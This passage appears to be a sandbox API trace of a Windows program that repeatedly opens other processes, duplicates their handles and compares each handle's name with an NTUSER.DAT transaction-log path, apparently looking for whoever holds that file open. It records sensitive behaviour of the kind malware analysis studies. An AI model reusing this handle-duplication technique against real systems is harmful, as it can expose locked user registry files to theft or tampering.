dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.819] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.820] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.821] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.821] CloseHandle (hObject=0x1e4) returned 1 [0165.821] _wcsicmp (_Str1="\\Microsoft-Windows-NCSI%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.821] CloseHandle (hObject=0x194) returned 1 [0165.821] CloseHandle (hObject=0x1e8) returned 1 [0165.821] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.821] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.821] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.822] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.823] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.823] CloseHandle (hObject=0x1e4) returned 1 [0165.823] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.823] CloseHandle (hObject=0x194) returned 1 [0165.823] CloseHandle (hObject=0x1e8) returned 1 [0165.823] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.823] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.823] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.824] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.825] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.825] CloseHandle (hObject=0x1e4) returned 1 [0165.825] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.825] CloseHandle (hObject=0x194) returned 1 [0165.825] CloseHandle (hObject=0x1e8) returned 1 [0165.825] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.825] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.825] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.826] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.827] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.827] CloseHandle (hObject=0x1e4) returned 1 [0165.827] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Program-Inventory.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.827] CloseHandle (hObject=0x194) returned 1 [0165.827] CloseHandle (hObject=0x1e8) returned 1 [0165.827] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.827] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.827] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.828] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.829] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.829] CloseHandle (hObject=0x1e4) returned 1 [0165.829] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Problem-Steps-Recorder.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.829] CloseHandle (hObject=0x194) returned 1 [0165.829] CloseHandle (hObject=0x1e8) returned 1 [0165.829] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.829] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.829] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.830] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.831] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.831] CloseHandle (hObject=0x1e4) returned 1 [0165.831] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Troubleshooter.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.831] CloseHandle (hObject=0x194) returned 1 [0165.831] CloseHandle (hObject=0x1e8) returned 1 [0165.831] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.831] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.831] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.832] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.833] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.833] CloseHandle (hObject=0x1e4) returned 1 [0165.833] _wcsicmp (_Str1="\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.833] CloseHandle (hObject=0x194) returned 1 [0165.833] CloseHandle (hObject=0x1e8) returned 1 [0165.833] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.833] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.833] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.834] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.835] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.835] CloseHandle (hObject=0x1e4) returned 1 [0165.835] _wcsicmp (_Str1="\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.835] CloseHandle (hObject=0x194) returned 1 [0165.835] CloseHandle (hObject=0x1e8) returned 1 [0165.835] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.835] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5e0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.835] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.836] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.836] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.837] CloseHandle (hObject=0x1e4) returned 1 [0165.837] _wcsicmp (_Str1="\\Microsoft-Windows-NetworkProfile%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.837] CloseHandle (hObject=0x194) returned 1 [0165.837] CloseHandle (hObject=0x1e8) returned 1 [0165.837] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.837] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5e8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.837] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.838] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.838] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.839] CloseHandle (hObject=0x1e4) returned 1 [0165.839] _wcsicmp (_Str1="\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.839] CloseHandle (hObject=0x194) returned 1 [0165.839] CloseHandle (hObject=0x1e8) returned 1 [0165.839] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.839] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x600, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.839] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.840] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.840] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.840] CloseHandle (hObject=0x1e4) returned 1 [0165.840] _wcsicmp (_Str1="\\Microsoft-Windows-NetworkAccessProtection%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.840] CloseHandle (hObject=0x194) returned 1 [0165.841] CloseHandle (hObject=0x1e8) returned 1 [0165.841] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.841] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x62c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.841] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.842] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.847] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.847] CloseHandle (hObject=0x1e4) returned 1 [0165.847] CloseHandle (hObject=0x194) returned 1 [0165.847] CloseHandle (hObject=0x1e8) returned 1 [0165.847] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.847] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x634, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.847] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.848] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.849] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.849] CloseHandle (hObject=0x1e4) returned 1 [0165.849] CloseHandle (hObject=0x194) returned 1 [0165.849] CloseHandle (hObject=0x1e8) returned 1 [0165.849] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.849] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x64c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.850] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.850] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.854] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.854] CloseHandle (hObject=0x1e4) returned 1 [0165.854] _wcsicmp (_Str1="\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.854] CloseHandle (hObject=0x194) returned 1 [0165.854] CloseHandle (hObject=0x1e8) returned 1 [0165.854] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.854] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x650, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.854] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.855] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.856] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.856] CloseHandle (hObject=0x1e4) returned 1 [0165.856] _wcsicmp (_Str1="\\Microsoft-Windows-WindowsBackup%4ActionCenter.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.856] CloseHandle (hObject=0x194) returned 1 [0165.856] CloseHandle (hObject=0x1e8) returned 1 [0165.856] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.856] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x67c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.856] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.857] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.858] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.858] CloseHandle (hObject=0x1e4) returned 1 [0165.858] _wcsicmp (_Str1="\\wkssvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0165.858] CloseHandle (hObject=0x194) returned 1 [0165.858] CloseHandle (hObject=0x1e8) returned 1 [0165.858] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.858] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x6ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.858] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.861] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.862] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.863] CloseHandle (hObject=0x1e4) returned 1 [0165.863] _wcsicmp (_Str1="\\WindowsUpdate.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0165.863] CloseHandle (hObject=0x194) returned 1 [0165.863] CloseHandle (hObject=0x1e8) returned 1 [0165.863] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.863] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x6d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.863] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.864] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.864] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.864] CloseHandle (hObject=0x1e4) returned 1 [0165.864] _wcsicmp (_Str1="\\Microsoft-Windows-Windows Defender%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.865] CloseHandle (hObject=0x194) returned 1 [0165.865] CloseHandle (hObject=0x1e8) returned 1 [0165.865] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.865] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x6dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.865] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.866] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.866] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.867] CloseHandle (hObject=0x1e4) returned 1 [0165.867] _wcsicmp (_Str1="\\Microsoft-Windows-Windows Defender%4WHC.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.867] CloseHandle (hObject=0x194) returned 1 [0165.867] CloseHandle (hObject=0x1e8) returned 1 [0165.867] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.867] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x730, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.867] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.868] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.868] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.869] CloseHandle (hObject=0x1e4) returned 1 [0165.869] _wcsicmp (_Str1="\\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.869] CloseHandle (hObject=0x194) returned 1 [0165.869] CloseHandle (hObject=0x1e8) returned 1 [0165.869] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.869] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x73c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.869] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.870] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.870] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.871] CloseHandle (hObject=0x1e4) returned 1 [0165.871] _wcsicmp (_Str1="\\Microsoft-Windows-NetworkAccessProtection%4WHC.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.871] CloseHandle (hObject=0x194) returned 1 [0165.871] CloseHandle (hObject=0x1e8) returned 1 [0165.871] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.871] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x750, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.871] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.872] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.875] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.876] CloseHandle (hObject=0x1e4) returned 1 [0165.876] _wcsicmp (_Str1="\\Microsoft-Windows-Diagnosis-Scheduled%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.876] CloseHandle (hObject=0x194) returned 1 [0165.876] CloseHandle (hObject=0x1e8) returned 1 [0165.876] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.876] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x75c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.876] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.877] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.878] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.878] CloseHandle (hObject=0x1e4) returned 1 [0165.878] _wcsicmp (_Str1="\\Microsoft-Windows-Resource-Exhaustion-Resolver%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.878] CloseHandle (hObject=0x194) returned 1 [0165.878] CloseHandle (hObject=0x1e8) returned 1 [0165.878] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0165.878] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.878] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.880] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.884] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.884] CloseHandle (hObject=0x1e4) returned 1 [0165.884] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0165.884] CloseHandle (hObject=0x194) returned 1 [0165.884] CloseHandle (hObject=0x1e8) returned 1 [0165.884] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0165.884] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.884] 